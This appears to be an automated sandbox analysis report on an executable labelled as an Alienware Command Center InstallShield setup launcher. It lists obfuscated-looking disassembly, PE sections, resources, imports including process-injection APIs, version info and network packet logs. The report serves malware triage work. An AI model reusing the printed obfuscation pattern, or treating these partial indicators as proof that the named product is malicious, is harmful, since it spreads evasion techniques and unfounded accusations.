                                                                                                                                                                        mov dword ptr [ebp-14h], 0044523Ah
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 04h
                                                                                                                                                                        jne 00007F8DB4EE0FA2h
                                                                                                                                                                        inc esi
                                                                                                                                                                        mov ecx, dword ptr [esp]
                                                                                                                                                                        add eax, edx
                                                                                                                                                                        mov ecx, dword ptr [esp]
                                                                                                                                                                        mov ecx, dword ptr [ecx]
                                                                                                                                                                        call ebp
                                                                                                                                                                        mov edx, esi
                                                                                                                                                                        pop edx
                                                                                                                                                                        popad
                                                                                                                                                                        push 00000003h
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 04h
                                                                                                                                                                        jne 00007F8DB4EE0F9Dh
                                                                                                                                                                        mov edx, ebx
                                                                                                                                                                        mov edi, ebp
                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                        mov eax, dword ptr [esp]
                                                                                                                                                                        mov eax, ecx
                                                                                                                                                                        popad
                                                                                                                                                                        mov eax, 004455BCh
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 04h
                                                                                                                                                                        jne 00007F8DB4EE0FA4h
                                                                                                                                                                        mov edx, dword ptr [ecx]
                                                                                                                                                                        push ebx
                                                                                                                                                                        mov eax, dword ptr [esp]
                                                                                                                                                                        dec ebx
                                                                                                                                                                        mov esi, edi
                                                                                                                                                                        pushad
                                                                                                                                                                        mov ebx, ecx
                                                                                                                                                                        inc dword ptr [ecx]
                                                                                                                                                                        idiv eax
                                                                                                                                                                        mov edx, ecx
                                                                                                                                                                        popad
                                                                                                                                                                        push eax
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 04h
                                                                                                                                                                        jne 00007F8DB4EE0F9Fh
                                                                                                                                                                        pop edi
                                                                                                                                                                        inc ecx
                                                                                                                                                                        mov ebp, ecx
                                                                                                                                                                        mov ecx, esp
                                                                                                                                                                        cmp eax, edx
                                                                                                                                                                        imul eax, edx
                                                                                                                                                                        mov esp, esi
                                                                                                                                                                        popad
                                                                                                                                                                        push 000013C5h
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 04h
                                                                                                                                                                        jne 00007F8DB4EE0F9Fh
                                                                                                                                                                        dec edx
                                                                                                                                                                        mov ecx, edi
                                                                                                                                                                        popad
                                                                                                                                                                        mov esi, ebx
                                                                                                                                                                        push eax
                                                                                                                                                                        call esp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        idiv eax
                                                                                                                                                                        popad
                                                                                                                                                                        push 00445DF0h
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 00000000h

                                                                                                                                                                        Rich Headers

                                                                                                                                                                        Programming Language:
                                                                                                                                                                        • [RES] VS2012 UPD1 build 51106
                                                                                                                                                                        • [C++] VS2012 UPD1 build 51106
                                                                                                                                                                        • [ C ] VS2012 UPD1 build 51106
                                                                                                                                                                        • [LNK] VS2012 UPD1 build 51106

                                                                                                                                                                        Data Directories

                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9abd00xdc.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x498ec.rsrc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xf20000x8454.reloc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x768a00x38.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x877100x40.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x760000x4f4.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x9a5b40xe0.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                        Sections

                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        .text0x10000x744970x74600False0.513208243824data6.58470653969IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rdata0x760000x2662a0x26800False0.360135957792data4.65071874944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .data0x9d0000xa9700x2400False0.295789930556data4.48877485279IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rsrc0xa80000x498ec0x49a00False0.341989203098data6.45902686047IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .reloc0xf20000x1f3b60x1f400False0.0011484375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                        Resources

                                                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                                                        GIF0xa8db40x339fGIF image data, version 89a, 350 x 624EnglishUnited States
                                                                                                                                                                        PNG0xac1540x39edPNG image data, 360 x 150, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        PNG0xafb440x2fc9PNG image data, 240 x 227, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        RT_BITMAP0xb2b100x14220data
                                                                                                                                                                        RT_BITMAP0xc6d300x1b5cdata
                                                                                                                                                                        RT_BITMAP0xc888c0x38e4data
                                                                                                                                                                        RT_BITMAP0xcc1700x1238data
                                                                                                                                                                        RT_BITMAP0xcd3a80x6588data
                                                                                                                                                                        RT_BITMAP0xd39300x11f88data
                                                                                                                                                                        RT_ICON0xe58b80x468GLS_BINARY_LSB_FIRST
                                                                                                                                                                        RT_ICON0xe5d200x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4289178028, next used block 4289178028
                                                                                                                                                                        RT_ICON0xe6dc80x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4289178028, next used block 4289178028
                                                                                                                                                                        RT_ICON0xe93700x2e8data
                                                                                                                                                                        RT_ICON0xe96580x2e8data
                                                                                                                                                                        RT_DIALOG0xe99400x1cedata
                                                                                                                                                                        RT_DIALOG0xe9b100x266data
                                                                                                                                                                        RT_DIALOG0xe9d780x2b0data
                                                                                                                                                                        RT_DIALOG0xea0280x54data
                                                                                                                                                                        RT_DIALOG0xea07c0x34data
                                                                                                                                                                        RT_DIALOG0xea0b00xd6data
                                                                                                                                                                        RT_DIALOG0xea1880x114data
                                                                                                                                                                        RT_DIALOG0xea29c0xd6data
                                                                                                                                                                        RT_DIALOG0xea3740x246data
                                                                                                                                                                        RT_DIALOG0xea5bc0x3c8data
                                                                                                                                                                        RT_DIALOG0xea9840x14edata
                                                                                                                                                                        RT_DIALOG0xeaad40x1e8data
                                                                                                                                                                        RT_DIALOG0xeacbc0x1c6data
                                                                                                                                                                        RT_DIALOG0xeae840x1eedata
                                                                                                                                                                        RT_DIALOG0xeb0740x7cdata
                                                                                                                                                                        RT_DIALOG0xeb0f00x3bcdata
                                                                                                                                                                        RT_DIALOG0xeb4ac0x158data
                                                                                                                                                                        RT_DIALOG0xeb6040x1dadata
                                                                                                                                                                        RT_DIALOG0xeb7e00x10adata
                                                                                                                                                                        RT_DIALOG0xeb8ec0xdedata
                                                                                                                                                                        RT_DIALOG0xeb9cc0x1d4data
                                                                                                                                                                        RT_DIALOG0xebba00x1dcdata
                                                                                                                                                                        RT_DIALOG0xebd7c0x294data
                                                                                                                                                                        RT_STRING0xec0100x160dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xec1700x23edataEnglishUnited States
                                                                                                                                                                        RT_STRING0xec3b00x378dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xec7280x252dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xec97c0x1f4dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xecb700x66adataEnglishUnited States
                                                                                                                                                                        RT_STRING0xed1dc0x366dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xed5440x27edataEnglishUnited States
                                                                                                                                                                        RT_STRING0xed7c40x518dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xedcdc0x882dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xee5600x23edataEnglishUnited States
                                                                                                                                                                        RT_STRING0xee7a00x3badataEnglishUnited States
                                                                                                                                                                        RT_STRING0xeeb5c0x12cdataEnglishUnited States
                                                                                                                                                                        RT_STRING0xeec880x4adataEnglishUnited States
                                                                                                                                                                        RT_STRING0xeecd40xdadataEnglishUnited States
                                                                                                                                                                        RT_STRING0xeedb00x110dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xeeec00x20adataEnglishUnited States
                                                                                                                                                                        RT_STRING0xef0cc0xbadataEnglishUnited States
                                                                                                                                                                        RT_STRING0xef1880xa8dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xef2300x12adataEnglishUnited States
                                                                                                                                                                        RT_STRING0xef35c0x422dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xef7800x5c2dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xefd440x40dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xefd840xcaadataEnglishUnited States
                                                                                                                                                                        RT_STRING0xf0a300x284dataEnglishUnited States
                                                                                                                                                                        RT_GROUP_ICON0xf0cb40x30data
                                                                                                                                                                        RT_GROUP_ICON0xf0ce40x14data
                                                                                                                                                                        RT_GROUP_ICON0xf0cf80x14data
                                                                                                                                                                        RT_VERSION0xf0d0c0x428data
                                                                                                                                                                        RT_MANIFEST0xf11340x535XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                        RT_MANIFEST0xf166c0x280XML 1.0 document textEnglishUnited States

                                                                                                                                                                        Imports

                                                                                                                                                                        DLLImport
                                                                                                                                                                        COMCTL32.dll
                                                                                                                                                                        KERNEL32.dllLoadLibraryW, lstrcmpW, lstrcmpiW, GetSystemDefaultLangID, GetUserDefaultLangID, VerLanguageNameW, CompareFileTime, CreateDirectoryW, FindClose, FindFirstFileW, FindNextFileW, SetFileAttributesW, GetSystemTimeAsFileTime, GetPrivateProfileStringW, MoveFileW, LocalFree, FormatMessageW, GetSystemInfo, MulDiv, RaiseException, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LoadLibraryExW, GetVersion, GetLocalTime, IsValidLocale, GetCommandLineW, GetFileAttributesW, GlobalAlloc, GlobalFree, FlushFileBuffers, VirtualQuery, IsBadReadPtr, GetDiskFreeSpaceExW, GetDriveTypeW, GetExitCodeProcess, GetCurrentThread, GetLocaleInfoW, InterlockedExchange, LoadLibraryExA, GetModuleHandleW, GetProcAddress, GetSystemDirectoryA, LoadLibraryA, GetLastError, SetLastError, CreateFileW, GetFileSize, CloseHandle, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, lstrlenA, MultiByteToWideChar, WideCharToMultiByte, ReadFile, SetFilePointer, WriteFile, HeapAlloc, lstrcmpA, SystemTimeToFileTime, ResetEvent, SetEvent, FindResourceExW, OpenProcess, GetProcessTimes, ReadConsoleW, WriteConsoleW, SetStdHandle, GetCurrentDirectoryW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, GetTimeFormatW, GetDateFormatW, OutputDebugStringW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetFileType, HeapReAlloc, GetStartupInfoW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, SetUnhandledExceptionFilter, UnhandledExceptionFilter, FreeLibrary, CompareStringA, CompareStringW, lstrcatW, GetVersionExW, InterlockedDecrement, InterlockedIncrement, CreateEventW, QueryPerformanceFrequency, GetTempFileNameW, CopyFileW, GetTickCount, GetExitCodeThread, CreateThread, FindResourceW, GlobalUnlock, GlobalLock, SizeofResource, LockResource, LoadResource, lstrcpyW, SetErrorMode, GetTempPathW, ExpandEnvironmentStringsW, MoveFileExW, WriteProcessMemory, VirtualProtectEx, GetWindowsDirectoryW, GetSystemDirectoryW, FlushInstructionCache, SetThreadContext, GetThreadContext, CreateProcessW, ResumeThread, TerminateProcess, ExitProcess, GetCurrentProcess, Sleep, WaitForSingleObject, DuplicateHandle, RemoveDirectoryW, DeleteFileW, SetCurrentDirectoryW, lstrlenW, lstrcpynW, GetModuleFileNameW, GetProcessHeap, HeapFree, GetStringTypeW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, GetCurrentThreadId, HeapSize, GetModuleHandleExW, GetStdHandle, GetFullPathNameW, IsProcessorFeaturePresent, IsDebuggerPresent, RtlUnwind, LCMapStringW, DecodePointer, EncodePointer
                                                                                                                                                                        USER32.dllDefWindowProcW, PostMessageW, DispatchMessageW, TranslateMessage, GetMessageW, RegisterClassW, PostQuitMessage, CharPrevW, SendDlgItemMessageW, wvsprintfW, LoadImageW, CreateDialogParamW, MoveWindow, SetCursor, GetWindow, GetDlgItemTextW, SetFocus, EnableWindow, SetForegroundWindow, SetActiveWindow, SetDlgItemTextW, IsDialogMessageW, FindWindowW, SubtractRect, IntersectRect, SetRect, FillRect, GetSysColorBrush, GetSysColor, GetWindowRect, GetDC, GetSystemMetrics, GetDlgCtrlID, CreateDialogIndirectParamW, DestroyWindow, IsWindow, SendMessageW, MessageBoxW, CharNextW, WaitForInputIdle, SetWindowLongW, GetWindowLongW, GetClientRect, EndPaint, BeginPaint, ReleaseDC, GetWindowDC, SetWindowPos, SetWindowTextW, GetDlgItem, ExitWindowsEx, CharUpperW, EndDialog, DialogBoxIndirectParamW, ShowWindow, GetDesktopWindow, MsgWaitForMultipleObjects, PeekMessageW, wsprintfW, LoadIconW, LoadCursorW, KillTimer, SetTimer, CreateWindowExW
                                                                                                                                                                        GDI32.dllTranslateCharsetInfo, UnrealizeObject, CreateHalftonePalette, GetDIBColorTable, SelectPalette, RealizePalette, GetSystemPaletteEntries, CreatePalette, CreateFontW, GetObjectW, SetTextColor, SetBkMode, GetDeviceCaps, CreateSolidBrush, CreateFontIndirectW, SetStretchBltMode, StretchBlt, SelectObject, DeleteDC, CreateDIBitmap, CreateCompatibleDC, BitBlt, DeleteObject, GetStockObject
                                                                                                                                                                        ADVAPI32.dllGetTokenInformation, RegOpenKeyExW, RegOpenKeyW, RegOverridePredefKey, LookupPrivilegeValueW, AdjustTokenPrivileges, RegCloseKey, FreeSid, EqualSid, AllocateAndInitializeSid, OpenThreadToken, OpenProcessToken, SetEntriesInAclW, SetSecurityDescriptorOwner, SetSecurityDescriptorGroup, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, CreateWellKnownSid, RegQueryInfoKeyW, RegEnumKeyExW, RegDeleteKeyW, RegSetValueExW, RegEnumValueW, RegCreateKeyExW, RegDeleteValueW, RegQueryValueExW
                                                                                                                                                                        SHELL32.dllSHGetMalloc, ShellExecuteExW, SHGetPathFromIDListW, SHGetFolderPathW, SHBrowseForFolderW, ShellExecuteW, CommandLineToArgvW
                                                                                                                                                                        ole32.dllCoCreateInstance, CoCreateGuid, CLSIDFromProgID, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree, CoInitialize, CoInitializeSecurity, CoUninitialize
                                                                                                                                                                        OLEAUT32.dllUnRegisterTypeLib, RegisterTypeLib, SysAllocStringLen, SysFreeString, SysReAllocStringLen, SysStringLen, SysAllocString, SysStringByteLen, SysAllocStringByteLen, VarBstrCat, VarBstrFromDate, VariantClear, VariantChangeType, GetErrorInfo, VarUI4FromStr, SystemTimeToVariantTime, LoadTypeLib
                                                                                                                                                                        SHLWAPI.dllPathFileExistsW
                                                                                                                                                                        RPCRT4.dllRpcStringFreeW, UuidCreate, UuidToStringW

                                                                                                                                                                        Version Infos

                                                                                                                                                                        DescriptionData
                                                                                                                                                                        LegalCopyrightCopyright (c) 2018 Flexera. All Rights Reserved.
                                                                                                                                                                        ISInternalVersion24.0.573
                                                                                                                                                                        InternalNameSetup
                                                                                                                                                                        FileVersion5.2.33.0
                                                                                                                                                                        CompanyNameDell Inc
                                                                                                                                                                        Internal Build Number185990
                                                                                                                                                                        ProductNameAlienware Command Center Suite
                                                                                                                                                                        ProductVersion5.2.33.0
                                                                                                                                                                        FileDescriptionSetup Launcher Unicode
                                                                                                                                                                        ISInternalDescriptionSetup Launcher Unicode
                                                                                                                                                                        OriginalFilenameInstallShield Setup.exe
                                                                                                                                                                        Translation0x0409 0x04b0

                                                                                                                                                                        Possible Origin

                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                        Network Behavior

                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                        TCP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Jan 30, 2021 14:31:11.635849953 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:11.823514938 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:11.823671103 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:11.824554920 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:11.824605942 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:12.012116909 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:12.012165070 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:12.335077047 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:12.365892887 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:12.365950108 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:12.553586006 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:12.553599119 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:13.742291927 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:13.787702084 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:13.833859921 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:13.833919048 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:14.022130966 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:14.022171021 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:17.383786917 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:17.428641081 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:19.318113089 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:19.318176031 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:19.505898952 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:19.505939007 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:22.825290918 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:22.913503885 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:25.540046930 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:25.727830887 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:25.727924109 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:25.730926037 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:25.731009007 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:25.920118093 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:25.920156956 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:26.497304916 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:26.686372995 CET804972334.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:26.686577082 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:26.687041998 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:26.687155962 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:26.877455950 CET804972334.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:26.877482891 CET804972334.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:27.603024960 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:30.286595106 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:30.414025068 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:32.487735033 CET804972334.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:32.726711035 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:33.553212881 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:33.553366899 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:33.742155075 CET804972334.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:33.742188931 CET804972334.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:37.934276104 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:37.934351921 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:38.112478018 CET804972334.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:38.123282909 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:38.123300076 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:38.228832006 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:39.173599005 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:39.186463118 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:39.186546087 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:39.374016047 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:39.374053955 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:41.303073883 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:43.455353975 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:43.545784950 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:43.785324097 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:43.785418987 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:43.972913027 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:43.972959042 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:45.013859987 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:45.142966032 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:45.143001080 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:45.332947016 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:45.332983971 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:49.696033001 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:49.710333109 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:49.900924921 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:50.896301031 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:51.025131941 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:32:07.928347111 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:32:07.928493023 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:32:08.116095066 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:32:08.116117001 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:32:12.093523979 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:32:12.136184931 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:32:18.248153925 CET4973980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:32:18.436991930 CET804973934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:32:18.437107086 CET4973980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:32:18.439049006 CET4973980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:32:18.627670050 CET804973934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:32:20.674977064 CET804973934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:32:20.675368071 CET4973980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:32:20.863068104 CET804973934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:32:20.863217115 CET4973980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:32:23.566790104 CET4972280192.168.2.334.94.64.66

                                                                                                                                                                        UDP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Jan 30, 2021 14:31:00.907012939 CET5598453192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:00.957948923 CET53559848.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:01.741487026 CET6418553192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:01.791228056 CET53641858.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:02.531462908 CET6511053192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:02.579535961 CET53651108.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:03.397799015 CET5836153192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:03.457474947 CET53583618.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:04.452759981 CET6349253192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:04.503590107 CET53634928.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:05.389067888 CET6083153192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:05.445884943 CET53608318.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:08.212579012 CET6010053192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:08.265733957 CET53601008.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:09.160429955 CET5319553192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:09.208587885 CET53531958.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:10.015846014 CET5014153192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:10.078201056 CET53501418.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:10.840487003 CET5302353192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:10.888454914 CET53530238.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:11.568495989 CET4956353192.168.2.38.8.8.8
